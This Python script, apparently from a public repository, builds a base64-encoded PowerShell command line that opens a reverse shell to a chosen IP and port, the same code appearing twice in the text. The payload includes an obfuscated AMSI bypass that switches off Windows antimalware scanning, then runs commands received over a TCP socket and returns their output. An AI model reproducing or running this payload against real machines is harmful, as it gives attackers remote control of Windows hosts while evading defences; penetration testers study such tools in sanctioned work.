ricardojoserf/encoded_nishang_reverse.py

## encoded_nishang_reverse.py
#!/usr/bin/env python3
#
# Based on tothi's file: https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58 (I just updated the payload)
# The payload is generated with Nikhil Mittal(@samratashok)'s Nishang https://github.com/samratashok/nishang
#

import sys
import base64

def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
    print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
    exit()

try:
    (ip, port) = (sys.argv[1], int(sys.argv[2]))
except:
    help()

payload = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( \"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL ).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),( \"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"( ${n`ULl},${t`RuE} );$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte, 0,$sendbyte.Length);$stream.Flush()};$client.Close()"
payload = payload % (ip, port)

cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmdline)
	#!/usr/bin/env python3
	#
	# Based on tothi's file: https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58 (I just updated the payload)
	# The payload is generated with Nikhil Mittal(@samratashok)'s Nishang https://github.com/samratashok/nishang
	#

	import sys
	import base64

	def help():
	print("USAGE: %s IP PORT" % sys.argv[0])
	print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
	exit()

	try:
	(ip, port) = (sys.argv[1], int(sys.argv[2]))
	except:
	help()

	payload = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( \"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL ).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),( \"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"( ${n`ULl},${t`RuE} );$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte, 0,$sendbyte.Length);$stream.Flush()};$client.Close()"
	payload = payload % (ip, port)

	cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

	print(cmdline)